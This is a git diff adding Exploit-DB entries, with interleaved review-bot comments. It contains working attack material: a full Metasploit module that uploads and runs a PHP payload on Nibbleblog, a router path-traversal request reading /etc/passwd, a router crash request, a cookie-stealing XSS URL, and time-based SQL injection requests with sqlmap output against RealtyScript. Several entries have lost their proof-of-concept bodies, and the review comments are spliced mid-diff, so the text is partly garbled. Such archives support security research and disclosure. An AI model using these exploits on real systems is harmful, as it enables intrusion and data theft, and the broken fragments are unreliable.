diff --git a/files.csv b/files.csv
index 21a734b37..899d0abc8 100755
--- a/files.csv
+++ b/files.csv
@@ -34762,3 +34762,14 @@ id,file,description,date,author,platform,type,port
 38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
 38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0
 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
+38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0
+38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal Vulnerability",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
+38489,platforms/php/remote/38489.rb,"Nibbleblog File Upload Vulnerability",2015-10-19,metasploit,php,remote,0
+38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0
+38491,platforms/php/webapps/38491.php,"SMF 'index.php' HTML injection and Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0
+38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router Cross Site Request Forgery Vulnerability",2013-04-24,"Jacob Holcomb",hardware,remote,0
+38493,platforms/hardware/remote/38493.txt,"Cisco Linksys WRT310N Router Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,remote,0
+38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin Remote PHP Code Execution Vulnerability",2013-04-24,anonymous,php,webapps,0
+38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery Vulnerability",2013-04-25,"Jacob Holcomb",hardware,remote,0
+38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS
Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
+38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
diff --git a/platforms/hardware/remote/38492.html b/platforms/hardware/remote/38492.html
new file mode 100755
index 000000000..4f88c8dda
--- /dev/null
+++ b/platforms/hardware/remote/38492.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/59442/info
+
+The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerability.
+
+Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
+
+d> Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS
\ No newline at end of file
diff --git a/platforms/hardware/remote/38493.txt b/platforms/hardware/remote/38493.txt
new file mode 100755
index 000000000..6c52d91a1
--- /dev/null
+++ b/platforms/hardware/remote/38493.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/59445/info
+
+The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.
+
+Successful exploits will cause the device to crash, denying service to legitimate users.
+
+http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1
\ No newline at end of file
diff --git a/platforms/hardware/remote/38495.html b/platforms/hardware/remote/38495.html
new file mode 100755
index 000000000..a22b1e748
--- /dev/null
+++ b/platforms/hardware/remote/38495.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/59476/info
+
+Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability.
+
+Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
+
+ Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.
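Review bot: The committed body of 38492.html contains no proof of concept — after the two advisory sentences only the fragment `d> Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS` survives, which reads like the tail of a `<title>` element whose HTML form was lost, and that title names the Cisco WRT310Nv2 rather than the TP-Link TL-WR1043N that the files.csv entry and BID 59442 describe. The auto-submitting form against the router's admin interface should be restored from the source advisory before this lands, otherwise the entry cannot be checked or reproduced. If the device mismatch is in the upstream file rather than an artefact of this import, a comment such as `<!-- NOTE: title copied from the author's WRT310N PoC; this file targets the TL-WR1043N (BID 59442) -->` would keep readers from filing it under the wrong device.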
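Review bot: The PoC URL says nothing about what access it needs or which field is the trigger: `apply.cgi` is the router's configuration-apply handler, so the request presumably has to be sent with an authenticated session (or delivered via CSRF from a logged-in browser), and the only non-default value is `wan_wins_3=AAAAAAAAAAAAAAAAAAA`, which suggests an unchecked copy of a WINS address octet into a fixed-size buffer — that is an inference, not something the file states. A one-line preface would make the entry usable, e.g. `# Requires an authenticated session to apply.cgi (or a CSRF vector); the oversized wan_wins_3 value is the crash trigger.` The title promises "multiple" denial-of-service vulnerabilities but only one request is reproduced; either list the other parameters BID 59445 reports or state that only this one was verified.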
\ No newline at end of file
diff --git a/platforms/hardware/webapps/38488.txt b/platforms/hardware/webapps/38488.txt
new file mode 100755
index 000000000..3d3e47746
--- /dev/null
+++ b/platforms/hardware/webapps/38488.txt
@@ -0,0 +1,29 @@
+# Title: Path Traversal Vulnerability
+# Product: Belkin Router N150
+# Author: Rahul Pratap Singh
+# Website: https://0x62626262.wordpress.com
+# Contact:
+ Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
+ Twitter: @0x62626262
+# Vendor Homepage: http://www.belkin.com
+# Firmware Tested: 1.00.08, 1.00.09
+# CVE: 2014-2962
+
+Description:
+Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
+path traversal vulnerability through the built-in web interface. The
+webproc cgi
+module accepts a getpage parameter which takes an unrestricted file path as
+input. The web server runs with root privileges by default, allowing a
+malicious attacker to read any file on the system.
+
+A patch was released by Belkin but that is still vulnerable.
+
+POC:
+http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
+#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
+#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh
+
+Ref:
+https://www.kb.cert.org/vuls/id/774788
+https://0x62626262.wordpress.com/category/full-disclosure/
diff --git a/platforms/multiple/dos/38490.txt b/platforms/multiple/dos/38490.txt
new file mode 100755
index 000000000..1ef1abfa1
--- /dev/null
+++ b/platforms/multiple/dos/38490.txt
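Review bot: As with the other Holcomb CSRF entry in this commit, the HTML proof of concept for 38495.html is missing — only the title text `Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.` survives of the seventh line, so the form that flips the remote-management setting is not in the file. That form is the substance of the finding (a cross-site request that exposes the admin UI to the WAN), so it should be restored from BID 59476; as committed the entry is a two-sentence description with no reproducible request. If the import pipeline strips HTML, storing the form inside a fenced or escaped block would avoid losing it again.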
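Review bot: The header and description disagree about which firmware is affected — `# Firmware Tested: 1.00.08, 1.00.09` versus the description's `versions 1.00.07 and earlier` (wording that matches the VU#774788 note) — and the single sentence `A patch was released by Belkin but that is still vulnerable.` is the only hint that the point of this entry is that the patched builds remain exploitable. State that directly, e.g. `Belkin's fix for CVE-2014-2962 (VU#774788) shipped after 1.00.07; firmware 1.00.08 and 1.00.09 still return arbitrary files via the getpage parameter, as shown below.` The `# CVE: 2014-2962` line should be written `CVE-2014-2962` so CVE-keyed tooling picks it up. The `/etc/passwd` excerpt has also lost its line breaks (`#root:...:/bin/bash root:...:/bin/sh`), which is worth tidying since it is the evidence that the root-privileged read works.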
@@ -0,0 +1,13 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=547
+
+If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.
+
+A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "triteExternal" and change it to "writeExternal".
+
+This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/AvmSerializer.cpp), and is type confusion when calling the method writeExternal, which is implemented when a class extends IExternalizable (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/IExternalizable.html). The method is resolved on line 1437 of AvmSerializer.cpp by calling toplevel->getBinding, which does not guarantee that the binding is a method binding. It then gets cast to a method on line 773 and called, which is type confusion.
+
+One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method.
The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38490.zip
+
diff --git a/platforms/php/remote/38489.rb b/platforms/php/remote/38489.rb
new file mode 100755
index 000000000..61d1216c8
--- /dev/null
+++ b/platforms/php/remote/38489.rb
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'Nibbleblog File Upload Vulnerability',
+ 'Description' => %q{
+ Nibbleblog contains a flaw that allows a authenticated remote
+ attacker to execute arbitrary PHP code. This module was
+ tested on version 4.0.3.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
+ 'Roberto Soares Espreto ' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
+ ],
+ 'DisclosureDate' => 'Sep 01 2015',
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['Nibbleblog 4.0.3', {}]],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+ OptString.new('USERNAME', [true, 'The username to authenticate with']),
+ OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+ ], self.class)
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ def check
+ cookie = do_login(username, password)
+ return Exploit::CheckCode::Detected unless cookie
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'admin.php'),
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'controller' => 'settings',
+ 'action' => 'general'
+ }
+ )
+
+ if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
+ return Exploit::CheckCode::Appears
+ end
+ Exploit::CheckCode::Safe
+ end
+
+ def do_login(user, pass)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' =>
normalize_uri(target_uri.path, 'admin.php')
+ )
+
+ fail_with(Failure::Unreachable, 'No response received from the target.') unless res
+
+ session_cookie = res.get_cookies
+ vprint_status("#{peer} - Logging in...")
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'admin.php'),
+ 'cookie' => session_cookie,
+ 'vars_post' => {
+ 'username' => user,
+ 'password' => pass
+ }
+ )
+
+ return session_cookie if res && res.code == 302 && res.headers['Location']
+ nil
+ end
+
+ def exploit
+ unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check)
+ print_error("Target does not appear to be vulnerable.")
+ return
+ end
+
+ vprint_status("#{peer} - Authenticating using #{username}:#{password}")
+
+ cookie = do_login(username, password)
+ fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
+ vprint_good("#{peer} - Authenticated with Nibbleblog.")
+
+ vprint_status("#{peer} - Preparing payload...")
+ payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
+
+ data = Rex::MIME::Message.new
+ data.add_part('my_image', nil, nil, 'form-data; name="plugin"')
+ data.add_part('My image', nil, nil, 'form-data; name="title"')
+ data.add_part('4', nil, nil, 'form-data; name="position"')
+ data.add_part('', nil, nil, 'form-data; name="caption"')
+ data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"")
+ data.add_part('1', nil, nil, 'form-data; name="image_resize"')
+ data.add_part('230', nil, nil, 'form-data; name="image_width"')
+ data.add_part('200', nil, nil, 'form-data; name="image_height"')
+ data.add_part('auto', nil, nil, 'form-data; name="image_option"')
+ post_data = data.to_s
+
+ vprint_status("#{peer} - Uploading payload...")
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'admin.php'),
+ 'vars_get' => {
+ 'controller' => 'plugins',
+ 'action' => 'config',
'plugin' => 'my_image'
+ },
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data,
+ 'cookie' => cookie
+ )
+
+ if res && /Call to a member function getChild\(\) on a non\-object/ === res.body
+ fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')
+ elsif res && !( res.body.include?('Warning') || res.body.include?('warn') )
+ fail_with(Failure::Unknown, 'Unable to upload payload.')
+ end
+
+ vprint_good("#{peer} - Uploaded the payload.")
+
+ php_fname = 'image.php'
+ payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
+ vprint_status("#{peer} - Parsed response.")
+
+ register_files_for_cleanup(php_fname)
+ vprint_status("#{peer} - Executing the payload at #{payload_url}.")
+ send_request_cgi(
+ 'uri' => payload_url,
+ 'method' => 'GET'
+ )
+ end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/38487.txt b/platforms/php/webapps/38487.txt
new file mode 100755
index 000000000..c01814397
--- /dev/null
+++ b/platforms/php/webapps/38487.txt
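Review bot: `do_login` treats any 302 carrying a `Location` header as a successful login, so a wrong USERNAME/PASSWORD that Nibbleblog answers with a redirect back to the login form (if it does — confirm against a deliberately failed login) is reported as authenticated, and `exploit` then dies later with the misleading `Unable to upload payload.`. Tighten it to the redirect target, for example `return session_cookie if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] !~ /admin\.php\/?$/`, or follow the redirect with `session_cookie` and require the dashboard before returning. Separately, `register_files_for_cleanup(php_fname)` registers the bare name `image.php` while the file is served from `content/private/plugins/my_image/`; as far as I recall FileDropper unlinks relative to the payload's working directory, so the cleanup would silently miss the file unless that happens to be the plugin directory — worth a comment such as `# NOTE: cleanup is best-effort; image.php may remain under content/private/plugins/my_image/`. The `vprint_status("#{peer} - Authenticating using #{username}:#{password}")` line also writes the password into the console log.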
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/59371/info
+
+The Colormix theme for WordPress is prone to multiple security vulnerabilities, including:
+
+1. A cross-site scripting vulnerability
+2. A path-disclosure vulnerability
+3. Multiple content-spoofing vulnerabilities
+
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Content spoofing:
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://www.example1.com
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
+
+Cross-site scripting:
+
+http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
\ No newline at end of file
diff --git a/platforms/php/webapps/38491.php b/platforms/php/webapps/38491.php
new file mode 100755
index 000000000..dd42f95e7
--- /dev/null
+++ b/platforms/php/webapps/38491.php
@@ -0,0 +1,42 @@
+source: http://www.securityfocus.com/bid/59409/info
+
+SMF is prone to an HTML-injection and multiple PHP code-injection vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the affected application and inject hostile HTML and script code into vulnerable sections of the application.
+
+SMF 2.0.4 is vulnerable; other versions may also be affected.
+
+'.$page;
+
+curl_close($ch); // to close 'logged-in' part
+
+?>
diff --git a/platforms/php/webapps/38494.txt b/platforms/php/webapps/38494.txt
new file mode 100755
index 000000000..8d14f758f
--- /dev/null
+++ b/platforms/php/webapps/38494.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/59470/info
+
+The WP Super Cache plugin for WordPress is prone to a remote PHP code-execution vulnerability.
+
+An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
+
+WP Super Cache 1.2 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/38496.txt b/platforms/php/webapps/38496.txt
new file mode 100755
index 000000000..e40d2ffc4
--- /dev/null
+++ b/platforms/php/webapps/38496.txt
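Review bot: The XSS proof of concept is left unexplained: the `aboutlink=data:text/html;base64,...` value decodes to `<script>alert(document.cookie)</script>`, and it presumably only fires when a viewer clicks the player's About link and the browser is willing to navigate to a `data:` URL from that link — neither condition is stated. Add the decoded payload and the click requirement under the `Cross-site scripting:` heading, e.g. `(aboutlink decodes to <script>alert(document.cookie)</script>; triggers when the About link is clicked)`. It is also worth noting that every listed URL hits the bundled third-party `jwplayer.swf`, so the remediation is to update or remove that SWF rather than patch the theme's PHP, and that the "path-disclosure" issue named in item 2 has no corresponding request in the file.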
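Review bot: The PHP exploit body is missing — of the 42 added lines only `'.$page;`, `curl_close($ch); // to close 'logged-in' part` and `?>` survive, so the `$ch` curl handle, the login request and the `index.php` injection payload they refer to are not in the file and the script cannot run. Restore the code from BID 59409 before this lands; if the source is unrecoverable, replace the fragment with an explicit marker such as `// PoC body lost during import; see BID 59409 for the request sequence` so the dangling `'.$page;` is not mistaken for a typo in an otherwise complete script.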
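Review bot: The proof of concept for the WP Super Cache 1.2 code execution is an empty line — the ninth added line holds nothing — so the entry states the impact but not how it is triggered, although the files.csv title promises a PoC. If the trigger was an HTML-comment-style tag (which the import pipeline would strip as markup), restore the exact line from BID 59470 rather than a paraphrase, since the tag syntax is the whole exploit, and store it escaped so it survives the next import. A note on where the payload is submitted (comment form vs. post body) and the privilege required would also belong here.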
@@ -0,0 +1,183 @@ + +RealtyScript v4.0.2 Multiple CSRF And Persistent XSS Vulnerabilities + + +Vendor: Next Click Ventures +Product web page: http://www.realtyscript.com +Affected version: 4.0.2 + +Summary: RealtyScript is award-winning real estate software that makes +it effortless for a real estate agent, office, or entrepreneur to be +up and running with a real estate web site in minutes. The software +is in daily use on thousands of domain names in over 40 countries and +has been translated into over 25 languages. + +Desc: The application allows users to perform certain actions via HTTP +requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative +privileges if a logged-in user visits a malicious web site. Multiple +cross-site scripting vulnerabilities were also discovered. The issue +is triggered when input passed via the multiple parameters is not +properly sanitized before being returned to the user. This can be +exploited to execute arbitrary HTML and script code in a user's browser +session in context of an affected site. + +Tested on: Apache/2.4.6 (CentOS) + PHP/5.4.16 + MariaDB-5.5.41 + + +Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5269 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5269.php + + +01.10.2015 + +--- + + +Dork: "Powered by RealtyScript v4.0.2" + + +-------------------- +Upload Stored XSS: +POST parameter: file +-------------------- + + + +
+ +
+ + + + +-------------- +CSRF Add User: +-------------- + + +
+ + + + + + + + + + + + + + + + + + +
+ + + + +------------------------------ +CSRF Add SUPERUSER: +Level SUPERUSER for SUPERUSER +Level Global for Administrator +------------------------------ + + +
+ + + + + +
+ + + + +----------------------------- +Stored XSS: +POST parameter: location_name +----------------------------- + + +
+ + + + +
+ + + + +---------------------------- +IFRAME Injection Stored XSS: +POST parameter: text +---------------------------- + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + diff --git a/platforms/php/webapps/38497.txt b/platforms/php/webapps/38497.txt new file mode 100755 index 000000000..29970e333 --- /dev/null +++ b/platforms/php/webapps/38497.txt 
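Review bot: Every proof of concept in this file is gone — under each heading (`Upload Stored XSS: POST parameter: file`, `CSRF Add User`, `CSRF Add SUPERUSER`, `Stored XSS: POST parameter: location_name`, `IFRAME Injection Stored XSS: POST parameter: text`) only empty added lines remain where the HTML forms presumably stood, so none of the five findings can be reproduced from this entry. The target URLs, form field names and the privilege levels named in the third heading (`Level SUPERUSER for SUPERUSER`, `Level Global for Administrator`) should be restored from ZSL-2015-5269, and since the payloads are HTML forms the file likely needs to be stored escaped or fenced so the import does not strip them again. Until then the `Desc:` paragraph is the only content, and it does not say which requests lack a CSRF token or where the stored XSS is rendered.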
@@ -0,0 +1,104 @@ + +RealtyScript v4.0.2 Multiple Time-based Blind SQL Injection Vulnerabilities + + +Vendor: Next Click Ventures +Product web page: http://www.realtyscript.com +Affected version: 4.0.2 + +Summary: RealtyScript is award-winning real estate software that makes +it effortless for a real estate agent, office, or entrepreneur to be +up and running with a real estate web site in minutes. The software +is in daily use on thousands of domain names in over 40 countries and +has been translated into over 25 languages. + +Desc: RealtyScript suffers from multiple SQL Injection vulnerabilities. +Input passed via the GET parameter 'u_id' and the POST parameter 'agent[]' +is not properly sanitised before being returned to the user or used in +SQL queries. This can be exploited to manipulate SQL queries by injecting +arbitrary SQL code. + +Tested on: Apache/2.4.6 (CentOS) + PHP/5.4.16 + MariaDB-5.5.41 + + +Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5270 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php + + +01.10.2015 + +-- + + +(1) + +GET /admin/users.php?req=remove&u_id=103 and (select * from (select(sleep(66)))a)-- & HTTP/1.1 + + +(2) + +POST /admin/mailer.php HTTP/1.1 +Host: TARGET +Content-Length: 62 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://TARGET +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Referer: http://TARGET/admin/mailer.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: PHPSESSID=vaq21340scj2u53a1b96ehvid5; + +agent[]=102 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=Send + + + + +====================================== .sqlmap session output 
======================================= + +$ sqlmap -r request1.txt -p "u_id" --dbms=MySQL --os=Linux --sql-query="SELECT @@version" + _ + ___ ___| |_____ ___ ___ {1.0-dev-04c1d43} +|_ -| . | | | .'| . | +|___|_ |_|_|_|_|__,| _| + |_| |_| http://sqlmap.org + +[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. + +[*] starting at 14:36:36 + +[14:36:36] [INFO] parsing HTTP request from 'request1.txt' +[14:36:36] [INFO] testing connection to the target URL +sqlmap identified the following injection points with a total of 0 HTTP(s) requests: +--- +Parameter: u_id (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (SELECT) + Payload: req=remove&u_id=103 AND (SELECT * FROM (SELECT(SLEEP(5)))YrMM) +--- +[14:36:36] [INFO] testing MySQL +[14:36:36] [INFO] confirming MySQL +[14:36:36] [INFO] the back-end DBMS is MySQL +web server operating system: Linux CentOS +web application technology: Apache 2.4.6, PHP 5.4.16 +back-end DBMS: MySQL >= 5.0.0 +[14:36:36] [INFO] fetching SQL SELECT statement query output: 'SELECT @@version' +[14:36:36] [WARNING] time-based comparison requires larger statistical model, please wait.............................. +[14:36:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors +do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y +[14:37:03] [INFO] adjusting time delay to 2 seconds due to good response times +5.5.41-MariaDB +SELECT @@version: '5.5.41-MariaDB' +[14:38:50] [INFO] fetched data logged to text files under '/.sqlmap/output/TARGET' + +[*] shutting down at 14:38:50 + +======================================= sqlmap session output. ======================================
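Review bot: Both injection points are authenticated administrative requests — `GET /admin/users.php?req=remove&u_id=...` and `POST /admin/mailer.php` with a `PHPSESSID` cookie — but the `Desc:` paragraph presents them as plain SQL injection without stating that an admin session is required, which materially changes the severity. Add the precondition, e.g. `Note: both requests require a logged-in administrator session (admin/ path, PHPSESSID cookie); these are post-authentication SQL injections.` The first request also uses `req=remove`, so verifying it against a live install deletes user 103 whether or not the `sleep()` fires — warn testers to use a throw-away id. The sqlmap transcript reports `a total of 0 HTTP(s) requests`, i.e. a resumed session, so it shows the data extraction but not the detection itself.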